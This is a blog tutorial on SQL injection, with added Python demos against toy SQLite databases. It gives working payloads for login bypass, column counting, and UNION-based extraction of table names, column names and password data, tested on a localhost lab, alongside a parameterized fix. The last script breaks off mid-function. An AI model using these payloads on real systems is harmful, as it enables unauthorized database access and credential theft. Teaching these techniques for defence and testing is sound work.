<!doctype html>
<html lang="zh-CN">
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
    <meta name="referrer" content="no-referrer-when-downgrade">
    

    <title>SQL Injection | matrix</title>
    <meta property="og:title" content="SQL Injection - matrix">
    <meta property="og:type" content="article">
        
    <meta property="article:published_time" content='2021-01-10T14:30:24&#43;08:00'>
        
        
    <meta property="article:modified_time" content='2021-01-10T14:30:24&#43;08:00'>
        
    <meta name="Keywords" content="hacking techniques, web security, understand the cause of every vulnerability and the principle behind every technique, blog, project management, python, software architecture, WeChat official account, mini program">
    <meta name="description" content="SQL Injection">
        
    <meta name="author" content="matrix">
    <meta property="og:url" content="https://gitmatrix.gitee.io/post/OWASP-10/SQL-%E6%B3%A8%E5%85%A5/">
    <link rel="shortcut icon" href='/favicon.ico'  type="image/x-icon">

    <link rel="stylesheet" href='/css/normalize.css'>
    <link rel="stylesheet" href='/css/style.css'>

    
    
    
    
    
    
    
        <link rel="stylesheet" href='/css/douban.css'>
    
        <link rel="stylesheet" href='/css/other.css'>
    
</head>


<body>
    <header id="header" class="clearfix">
    <div class="container">
        <div class="col-group">
            <div class="site-name ">
                
                    <a id="logo" href="https://gitmatrix.gitee.io/">
                        matrix
                    </a>
                
                <p class="description">Hacking techniques and web security: understand the cause of every vulnerability and the principle behind every technique</p>
            </div>
            <div>
                <nav id="nav-menu" class="clearfix">
                    <a class="current" href="https://gitmatrix.gitee.io/">Home</a>
                    
                    <a  href="https://gitmatrix.gitee.io/archives/" title="Archives">Archives</a>
                    
                    <a  href="https://gitmatrix.gitee.io/about/" title="About">About</a>
                    
                </nav>
            </div>
        </div>
    </div>
</header>

    <div id="body">
        <div class="container">
            <div class="col-group">

                <div class="col-8" id="main">
                    
<div class="res-cons">
    <article class="post">
        <header>
            <h1 class="post-title">SQL Injection</h1>
        </header>
        <date class="post-meta meta-date">
            January 10, 2021
        </date>
        
        <div class="post-meta">
            <span>|</span>
            
            <span class="meta-category"><a href='/categories/Web-%E5%AE%89%E5%85%A8'>Web Security</a></span>
            
            <span class="meta-category"><a href='/categories/%E5%8D%81%E5%A4%A7%E6%BC%8F%E6%B4%9E'>Top 10 Vulnerabilities</a></span>
            
        </div>
        
        
        
        <div class="post-content">
            <h1 id="sql注入">SQL Injection</h1>
<h2 id="1sql注入原理">1. How SQL injection works</h2>
<blockquote>
<p>SQL injection occurs when a <a href="https://baike.baidu.com/item/web%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F/2498090">web application</a> <strong>does not validate user input, or filters it too loosely</strong>, so that an attacker can <strong>append extra <a href="https://baike.baidu.com/item/SQL%E8%AF%AD%E5%8F%A5/5714895">SQL</a> to the query the application has already built</strong>. The database server cannot tell the application's SQL from the attacker's, so it <strong>executes queries the application never authorised</strong>, and the attacker reads (or changes) data without the administrator noticing.</p>
</blockquote>
<h2 id="2注入过程">2. The injection process</h2>
<h3 id="第一步sql注入点探测">Step 1: finding the injection point</h3>
<blockquote>
<p>Finding the injection point is the key step. By analysing the application you can work out where injection is possible. <strong>Any dynamic page that accepts submitted input and uses it to query the database is a candidate.</strong></p>
<p>If the developer builds SQL statements dynamically (by string concatenation) and does not validate the input, the chance of an injection flaw is high. <strong>The usual first signal is the page's error output</strong>; where errors are suppressed, the boolean and time-based techniques listed below give the same answer without one.</p>
</blockquote>
<p>User input lands in a SQL statement in one of two forms: <strong>as a number</strong> or <strong>as a string</strong>.</p>
<div class="highlight"><pre><code class="language-sql" data-lang="sql">-- numeric injection: the value is not quoted
select * from user where id=1
select * from user where id=(1)
-- string injection: the point is to escape from, or close, the quotes
select * from user where id='1'
select * from user where id="1"
select * from user where id=('1')
-- the parentheses carry no extra meaning here; they only group the expression
-- (a payload injected inside them has to close them too)
</code></pre></div><h4 id="sql注入可能出现的位置">Where SQL injection can occur</h4>
<p>A SQL injection flaw can only exist <strong>where the user controls the input</strong>, and that input reaches the application in three places:</p>
<ul>
<li><strong>URL parameters (data sent by GET)</strong></li>
<li><strong>The HTTP request body (data sent by POST)</strong></li>
<li><strong>HTTP request headers (User-Agent, Referer, Cookie)</strong></li>
</ul>
<blockquote>
<p>The common exploitation techniques fall into four groups:</p>
<ul>
<li>Union-based injection (<code>union select</code>)</li>
<li>Boolean-based blind injection</li>
<li>Time-based blind injection</li>
<li>Error-based injection</li>
</ul>
</blockquote>
<h4 id="1-url提交参数探测">1. Probing URL parameters</h4>
<blockquote>
<p>A GET request that may be injectable typically looks like: http://xxx.xxx.xxx/abc.asp?id=XX</p>
<p>The URL carries one or more parameters, sometimes integers and sometimes strings. If the application does not filter the characters it receives, the parameter is very likely injectable, so you craft values for it and judge from how the page responds.</p>
</blockquote>
<h6 id="最常用内联注入方式">The most common inline probes</h6>
<table>
<thead>
<tr>
<th>Test string</th>
<th>Expected result</th>
<th>Variants</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>'</code></td>
<td>Breaks the syntax; the database returns an error.</td>
<td>(close the quote, add a comment, add a boolean condition, etc.)</td>
</tr>
<tr>
<td><code>' or 1=1</code></td>
<td>Always true; returns every row.</td>
<td><code>or 1=1 --+</code> (numeric; the <code>+</code> decodes to the space MySQL requires after <code>--</code>), <code>') or 1=1 #</code> (value inside parentheses)</td>
</tr>
<tr>
<td><code>' and 1=2</code></td>
<td>Always false; returns nothing.</td>
<td><code>' AND '1'='2</code>, <code>') AND ('1'='2</code>, <code>and 1=2</code> (numeric; pair it with <code>and 1=1</code>)</td>
</tr>
</tbody>
</table>
<blockquote>
<p>Numbers and strings differ in two ways: ① a number is not wrapped in single quotes ('); ② a number can take part in arithmetic (so <code>id=2-1</code> behaves like <code>id=1</code>, which is how you confirm a numeric context), a string cannot.</p>
</blockquote>
<p>Testing an integer parameter:</p>
<div class="highlight"><pre><code class="language-sql" data-lang="sql">-- the application's query (the value is filled in from the request):
select * from user where id= ;
-- the request:
http://xxx.xxx.xxx/abc.asp?id=YY
</code></pre></div><p>Test for injection with these steps:</p>
<ol>
<li>Append a single quote to the URL parameter:</li>
</ol>
<div class="highlight"><pre><code class="language-sql" data-lang="sql">http://xxx.xxx.xxx/abc.asp?id=YY'
-- after submission the SQL becomes (the quote is unbalanced, so the parser fails):
select * from table_name where id=YY'
</code></pre></div><p>If the page does no error handling, it usually prints the database's syntax error:</p>
<p>
    <img class="mx-auto" alt="image-20210120183304386" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210120183304386.png" />
</p>
<ol start="2">
<li>Add an <code>and</code> or <code>or</code> comparison to the URL parameter:</li>
</ol>
<div class="highlight"><pre><code class="language-sql" data-lang="sql">http://xxx.xxx.xxx/abc.asp?id=YY and 1=1
-- after submission the SQL becomes
select * from table_name where id=YY and 1=1;
</code></pre></div><p>Then compare what the page returns: if <code>and 1=1</code> returns the data and <code>and 1=2</code> returns nothing, the parameter is being evaluated as SQL with no filtering at all, which proves the injection point. This comparison also works when the application hides its error messages, which the single-quote test alone does not.</p>
<p>
    <img class="mx-auto" alt="image-20210120195750365" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210120195750365.png" />
</p>
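<p>The two probes above, as an added example that is not code from the original post: a throw-away SQLite application that concatenates the request parameter into <code>select * from user where id=...</code> (plus a string-context and a login variant), a parameterized version for comparison, and a <code>probe()</code> routine that sends the lone quote, <code>and 1=1</code> and <code>and 1=2</code> and reports which signals it saw. The table contents, the function names and the trailing <code>-- </code> comment terminator are this example's own assumptions; the login query is written with single quotes because SQLite reads double-quoted values as identifiers (MySQL accepts either).</p>

```python
"""Added example (not from the original post): a toy vulnerable app plus the
page's three probes, run against an in-memory SQLite database."""
import sqlite3
from typing import Callable, Dict, List, Union

Result = Union[List[tuple], str]   # result rows, or the text of a leaked DB error


def make_db() -> sqlite3.Connection:
    # Constructed sample data; `user` is the page's example table.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user(id INTEGER, username TEXT, password TEXT);
        INSERT INTO user VALUES (1, 'lssi',  '123456');
        INSERT INTO user VALUES (2, 'alice', 's3cret');
        INSERT INTO user VALUES (3, 'bob',   'hunter2');
    """)
    return conn


def run(conn: sqlite3.Connection, sql: str) -> Result:
    """Execute dynamically built SQL; an error comes back as text, the way an
    application with no error handling prints the database message on the page."""
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as e:
        return f"ERROR: {e}"


def numeric_lookup(conn: sqlite3.Connection, raw_id: str) -> Result:
    # Numeric context: the value is pasted in with no quotes around it.
    return run(conn, f"select * from user where id={raw_id}")


def string_lookup(conn: sqlite3.Connection, raw_name: str) -> Result:
    # String context: the attacker has to close the opening quote first.
    return run(conn, f"select * from user where username='{raw_name}'")


def login(conn: sqlite3.Connection, username: str, password: str) -> Result:
    # The page's login query (single quotes: SQLite treats double-quoted values
    # as identifiers, MySQL accepts either quote character for strings).
    return run(conn, f"select * from user where username='{username}' and password='{password}'")


def safe_lookup(conn: sqlite3.Connection, raw_id: str) -> Result:
    # The fix: a bound parameter is always data, never part of the SQL text.
    return conn.execute("select * from user where id=?", (raw_id,)).fetchall()


def probe(endpoint: Callable[[str], Result], good: str, quote: str = "") -> Dict[str, bool]:
    """Apply the page's three tests to one parameter.
    `good` is a value that returns data normally; `quote` is '' for a numeric
    parameter and "'" for a string one.  The trailing `-- ` comments out whatever
    the application appends after the injected text (the page's `--+`)."""
    baseline = endpoint(good)
    with_quote = endpoint(good + "'")
    always_true = endpoint(f"{good}{quote} and 1=1 -- ")
    always_false = endpoint(f"{good}{quote} and 1=2 -- ")
    return {
        # test 1: a stray quote breaks the syntax and the error reaches the page
        "error": isinstance(with_quote, str),
        # tests 2/3: true/false conditions change the result set, so the
        # parameter is evaluated as SQL even when no error is shown
        "boolean": baseline != [] and always_true == baseline and always_false == [],
    }


if __name__ == "__main__":
    db = make_db()
    print("id (numeric) :", probe(lambda v: numeric_lookup(db, v), "1"))
    print("username     :", probe(lambda v: string_lookup(db, v), "lssi", "'"))
    print("parameterized:", probe(lambda v: safe_lookup(db, v), "1"))
    print("login bypass :", login(db, "' or 1=1 -- ", "anything"))
```

<p>Run it as a script to see the verdict for each endpoint and the login that returns every user. The boolean signal is the one to rely on: the error signal disappears as soon as the application hides database errors, the difference between the <code>1=1</code> and <code>1=2</code> result sets does not. Against the parameterized endpoint neither signal appears, because the quote and the condition stay inside the bound value.</p>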
<p>In a login form the application's query is typically:</p>
<div class="highlight"><pre><code class="language-sql" data-lang="sql">select * from user where username="lssi" and password="123456";
</code></pre></div><p>Both values sit inside double-quoted strings, so a payload has to close that quote first: a username of <code>" or 1=1 --</code> makes the condition always true and comments the password check away.</p>
<h3 id="第二步收集后台数据库信息">Step 2: gathering information about the back-end database</h3>
<blockquote>
<p><strong>Each database has its own injection syntax and functions, so before exploiting the point, identify the database type.</strong></p>
<p>There are many ways to do this: send a special character such as a single quote and read the error message the application returns, or call a function that only one database product has.</p>
</blockquote>
<p><strong>Once the injection point is found, the next step is to collect more information</strong></p>
<h4 id="1使用-order-by--查找列数">1. Find the number of columns with <code>order by</code></h4>
<div class="highlight"><pre><code class="language-sql" data-lang="sql">http://xxx.xxx.xxx/abc.asp?id=YY order by x

select * from user where id=1 order by 3;
</code></pre></div><p>Raise or lower the number after <code>order by</code> until the page errors (or stops returning data). The largest value that still works is the number of columns the application's <code>select</code> returns (with <code>select *</code>, the number of columns in the table). You need that number for the <code>union</code> query in the next step, because a <code>union</code> only works when both sides return the same number of columns.</p>
<blockquote>
<p><strong><code>order by</code> is MySQL's clause for sorting a result set:</strong></p>
<div class="highlight"><pre><code class="language-sql" data-lang="sql">select * from table_name order by column_name asc;  -- ascending (the default); a column position (number) works too
select * from table_name order by column_name desc; -- descending
</code></pre></div><blockquote>
<p><strong>The point here is that <code>order by</code> accepts either a column name or a column position (a number).</strong></p>
</blockquote>
<p>For example, if <code>id</code> is the first column of the <code>user</code> table, sorting by <code>id</code> can be written two ways:</p>
<div class="highlight"><pre><code class="language-sql" data-lang="sql">select * from user order by id;
select * from user order by 1;
</code></pre></div></blockquote>
<p>Example:</p>
<div class="highlight"><pre><code class="language-sql" data-lang="sql">http://localhost:81/mysql/test.php?name=1+order+by+5 -- the plus sign stands for a space
http://localhost:81/mysql/test.php?name=1+order+by+6
</code></pre></div><p>
    <img class="mx-auto" alt="image-20210121093302929" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121093302929.png" />
</p>
<p>As the screenshot shows, <code>order by 5</code> returns data and <code>order by 6</code> returns nothing, so the query has 5 columns.</p>
<h4 id="2通过-union-select-连接查询数据库关键信息">2. Query key database information with <code>union select</code></h4>
<blockquote>
<p><strong>A <code>union</code> query must return the same number of columns as the main query.</strong></p>
<p><strong>UNION</strong>: combines the rows of two <code>select</code> statements that return the same number of columns, dropping duplicate rows.</p>
<p><strong>UNION ALL</strong>: the same, but keeps duplicate rows.</p>
<div class="highlight"><pre><code class="language-sql" data-lang="sql">select column_name from table_name union select column_name from table_name order by column_name;
SELECT column_name FROM table_name UNION ALL SELECT column_name FROM table_name ORDER BY column_name;
</code></pre></div></blockquote>
<p>With the column count from <code>order by</code>, build a <code>union select</code> with that many placeholder values; the placeholders that show up on the page tell you which columns are displayed and can carry extracted data.</p>
<p>For a count of 5, the query is <code>union select 1,2,3,4,5</code>:</p>
<div class="highlight"><pre><code class="language-sql" data-lang="sql">http://localhost:81/mysql/test.php?name=1+union+select+1,2,3,4,5
</code></pre></div><p>
    <img class="mx-auto" alt="image-20210121093807886" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121093807886.png" />
</p>
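<p>The <code>order by</code> walk and the <code>union select</code> placeholder step, as an added example that is not code from the original post: a throw-away SQLite stand-in for <code>test.php?name=...</code> whose table has five columns (constructed to match the screenshot), a <code>count_columns()</code> that increments <code>order by n</code> until the page stops returning data, and <code>union_row()</code> / <code>extract()</code> that fill the count with <code>null</code> placeholders and read one expression back through a chosen column. The function names, the table contents and the <code>-1</code> no-match trick are assumptions of this example; <code>sqlite_version()</code> stands in for MySQL's <code>version()</code>.</p>

```python
"""Added example (not from the original post): column counting with ORDER BY
and placeholder placement with UNION, against an in-memory SQLite database."""
import sqlite3
from typing import List, Optional


def make_db() -> sqlite3.Connection:
    # Constructed sample data: five columns, matching the page's
    # "order by 5 works, order by 6 does not" screenshot.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user(id INTEGER, username TEXT, password TEXT, email TEXT, role TEXT);
        INSERT INTO user VALUES (1, 'lssi',  '123456', 'lssi@example.test',  'admin');
        INSERT INTO user VALUES (2, 'alice', 's3cret', 'alice@example.test', 'user');
    """)
    return conn


def page(conn: sqlite3.Connection, raw: str) -> Optional[List[tuple]]:
    """The vulnerable endpoint (stand-in for test.php?name=...): the parameter is
    concatenated into the query.  The app hides database errors, so a failed
    query looks like 'no data' (None here); that is the signal the walk uses."""
    try:
        return conn.execute(f"select * from user where id={raw}").fetchall()
    except sqlite3.Error:
        return None


def count_columns(conn: sqlite3.Connection, good: str = "1", limit: int = 64) -> int:
    """Walk ORDER BY 1, 2, 3 ... until the page stops returning data; the last
    working n is the number of columns in the application's SELECT.  `limit`
    stops the walk if the endpoint never fails (then the oracle is wrong)."""
    n = 1
    while n <= limit and page(conn, f"{good} order by {n}") is not None:
        n += 1
    return n - 1


def union_row(conn: sqlite3.Connection, ncols: int,
              slot: Optional[int] = None, expr: str = "null") -> Optional[List[tuple]]:
    """Append `union all select` with `ncols` NULL placeholders (NULL fits every
    column type, so the union cannot fail on a type mismatch), optionally
    putting `expr` into column `slot` (1-based).  The leading -1 matches no
    real row, so the only row the page shows is the injected one."""
    cells = ["null"] * ncols
    if slot is not None:
        cells[slot - 1] = expr
    return page(conn, f"-1 union all select {','.join(cells)}")


def extract(conn: sqlite3.Connection, ncols: int, slot: int, expr: str):
    """Read the value of `expr` back through the displayed column `slot`."""
    rows = union_row(conn, ncols, slot, expr)
    return None if not rows else rows[0][slot - 1]


if __name__ == "__main__":
    db = make_db()
    n = count_columns(db)
    print("columns:", n)
    print("union with the wrong count:", page(db, "-1 union select 1,2,3,4"))
    print("numeric markers:", page(db, "-1 union select " + ",".join(map(str, range(1, n + 1)))))
    print("database version via column 2:", extract(db, n, 2, "sqlite_version()"))
```

<p>Run it as a script to print the count, the failure of a four-column union against a five-column query, the numeric markers, and a value read back through column 2. The walk relies on a SQL error being visible as "no data"; an application that returns its normal page whatever the query does needs a different oracle.</p>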
<blockquote>
<p>To avoid type errors, use a <code>union</code> that cannot fail: <code>union all select null,null,null...</code> (<code>null</code> is compatible with every column type, and the <code>-1</code> in the request below makes the original <code>where</code> match nothing, so only the injected row is shown)</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">5
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">all</span> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>...
 
 http:<span style="color:#000;font-weight:bold">//</span>localhost:<span style="color:#099">81</span><span style="color:#000;font-weight:bold">/</span>mysql<span style="color:#000;font-weight:bold">/</span>test.php<span style="color:#000;font-weight:bold">?</span>name<span style="color:#000;font-weight:bold">=-</span><span style="color:#099">1</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">union</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">all</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>
 
 <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=-</span><span style="color:#099">1</span> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">all</span> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>
</code></pre></td></tr></table>
</div>
</div><p><strong>null不会导致任何类型转换错误，因为它只是null</strong></p>
<p>id=-1 : 只显示union后面的数据</p>
</blockquote>
<p>Note: the pattern for nesting a further query inside the union select is:</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">-- union all select &lt;col1&gt;,(select group_concat(username) from user),&lt;col3&gt;,...
-- a scalar subquery occupies one column position and must return a single value; group_concat() packs many rows into it
select * from user where id=1 union all select (select group_concat(id,username) from user),2,3,4,5;
</code></pre>
</div>
</div><div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http://localhost:81/mysql/test.php?name=1+union+all+select+(select+group_concat(id,username)+from+user),null,null,null,null
</code></pre>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121151816023.png">
            <img class="mx-auto" alt="image-20210121151816023" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121151816023.png" />
        </a>
    </p>
<h4 id="3替换的列在页面上查看数据">3. Replace a column and read the data on the page.</h4>
<p>To read useful information you need database functions. The commonly used MySQL functions and system variables, and how to use them:</p>
<ul>
<li><strong><code>database()</code> current database name</strong></li>
<li><code>user()</code> current database user</li>
<li><code>version()</code> MySQL server version</li>
<li><code>@@version_compile_os</code> operating system the server was built for</li>
<li><code>@@basedir</code> MySQL installation directory</li>
</ul>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http://localhost:81/mysql/test.php?name=1+union+all+select+user(),database(),version(),@@version_compile_os,null

select * from user where id=1 union all select user(),database(),version(),@@version_compile_os,null
</code></pre>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121101311139.png">
            <img class="mx-auto" alt="image-20210121101311139" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121101311139.png" />
        </a>
    </p>
<h3 id="第三步猜解用户名和密码">Step 3: Guess the usernames and passwords</h3>
<blockquote>
<p>Guessing usernames and passwords. Table and column names in a database usually follow a pattern. By constructing crafted SQL statements, the table names, column names, column count, usernames and passwords are extracted from the database one after another.</p>
</blockquote>
<h4 id="1获取数据库">1. Get the database name</h4>
<p>The previous step's <code>union select database()</code> already gave us the database name:</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http://localhost:81/mysql/test.php?name=1+union+all+select+null,database(),null,null,null

-- the SQL query executed is:
select * from user where id=1 union all select null,database(),null,null,null
</code></pre>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121101836852.png">
            <img class="mx-auto" alt="image-20210121101836852" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121101836852.png" />
        </a>
    </p>
<h4 id="2知道数据库后获取数据表">2. With the database name known, get the table names</h4>
<p>Use the <code>table_name</code> column of the <code>tables</code> table in the <code>information_schema</code> database to list the tables of the database found in the previous step:</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">-- SQL statement prototype
-- note: a scalar subquery must return exactly one row, so this form fails with
-- "Subquery returns more than 1 row" as soon as the schema contains more than one table
select * from user where id=1 union all select (select table_name from information_schema.tables where table_schema=database()),2,3,4,5;
-- or name the current database directly
select * from user where id=1 union all select (select table_name from information_schema.tables where table_schema='test_php'),2,3,4,5;
-- or use group_concat() to collapse all table names into one value (preferred)
select * from user where id=1 union all select (select group_concat(table_name) from information_schema.tables where table_schema='test_php'),null,null,null,null;
</code></pre>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121150511113.png">
            <img class="mx-auto" alt="image-20210121150511113" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121150511113.png" />
        </a>
    </p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http://localhost:81/mysql/test.php?name=1+union+all+select+(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()),null,null,null,null
</code></pre>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121152133410.png">
            <img class="mx-auto" alt="image-20210121152133410" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121152133410.png" />
        </a>
    </p>
<h4 id="3知道数据表后获取表字段">3. With the table name known, get the column names</h4>
<p>Once the database and table names are known, get the column names from the <code>column_name</code> field of the <code>columns</code> table in the <code>information_schema</code> database:</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">select * from user where id=1 union all select (select group_concat(column_name) from information_schema.columns where table_schema='test_php' and table_name='user'),null,null,null,null;
</code></pre>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121153544963.png">
            <img class="mx-auto" alt="image-20210121153544963" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121153544963.png" />
        </a>
    </p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http://localhost:81/mysql/test.php?name=1+union+all+select+(select+group_concat(column_name)+from+information_schema.columns+where+table_schema=database()+and+table_name=%27user%27),null,null,null,null;
</code></pre>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121160540142.png">
            <img class="mx-auto" alt="image-20210121160540142" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121160540142.png" />
        </a>
    </p>
<h4 id="4获取数据">4. Get the data</h4>
<p>Once the database name, table name and column names are known, the data can be read with an ordinary query. Concatenating username and password with no separator makes the pairs hard to tell apart; <code>group_concat(username,0x3a,password)</code> puts a colon between them.</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">select username, password from user;
select group_concat(username,password) from user;

select * from user where id=1 union all select (select group_concat(username,password) from user),null,null,null,null;
</code></pre>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121155157457.png">
            <img class="mx-auto" alt="image-20210121155157457" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121155157457.png" />
        </a>
    </p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http://localhost:81/mysql/test.php?name=1+union+all+select+(select+group_concat(username,password)+from+user),null,null,null,null;
</code></pre>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121155424582.png">
            <img class="mx-auto" alt="image-20210121155424582" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121155424582.png" />
        </a>
    </p>
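<p>As an added example that is not part of the original post, the following Python script runs the whole procedure above end to end: it probes the column count with <code>null</code> placeholders, uses <code>id=-1</code> so that only the <code>union</code> row is returned, reads the catalogue for table and column names, and finally dumps credentials with <code>group_concat()</code>. It assumes SQLite (Python's bundled <code>sqlite3</code>) standing in for MySQL, so <code>sqlite_master</code> and <code>pragma_table_info()</code> take the place of <code>information_schema.tables</code> and <code>information_schema.columns</code>; the <code>user</code> table and its rows are constructed sample data, and <code>vulnerable_lookup</code> is a stand-in for <code>test.php</code>, shown beside the parameterised <code>safe_lookup</code> that fixes it.</p>

```python
"""Added example (not from the original post): UNION-based injection walk-through
against a tiny stand-in for the page's test.php endpoint.

Assumptions: SQLite replaces MySQL, so sqlite_master / pragma_table_info()
replace information_schema.tables / information_schema.columns, and the
column-count mismatch error text differs from MySQL's. The 'user' table
(id, username, password, email, role) and its rows are constructed data.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample schema with the five columns the page's payloads assume."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE user (
            id INTEGER PRIMARY KEY,
            username TEXT, password TEXT, email TEXT, role TEXT
        );
        INSERT INTO user VALUES
            (1, 'alice', 'p@ss1', 'alice@example.test', 'admin'),
            (2, 'bob',   'p@ss2', 'bob@example.test',   'user');
        """
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, name: str) -> list:
    """The bug: the ?name= parameter is concatenated straight into the SQL text."""
    sql = "SELECT * FROM user WHERE id=" + name
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, name: str) -> list:
    """The fix: a bound parameter is only ever a value, never SQL syntax."""
    return conn.execute("SELECT * FROM user WHERE id=?", (name,)).fetchall()


def probe_column_count(conn: sqlite3.Connection, max_cols: int = 20) -> int:
    """Grow 'UNION ALL SELECT null,null,...' until the database stops complaining
    about a column-count mismatch; NULL fits any column type, so no other error
    can mask the answer."""
    for n in range(1, max_cols + 1):
        payload = "-1 UNION ALL SELECT " + ",".join(["null"] * n)
        try:
            vulnerable_lookup(conn, payload)
            return n  # no error: the UNION now has the right width
        except sqlite3.OperationalError:
            continue  # wrong width, try one more column
    raise RuntimeError("column count not found")


def extract(conn: sqlite3.Connection, expression: str, ncols: int) -> str:
    """Place one scalar subquery in the first column and NULL in the rest; id=-1
    matches no real row, so the only row returned is the injected one."""
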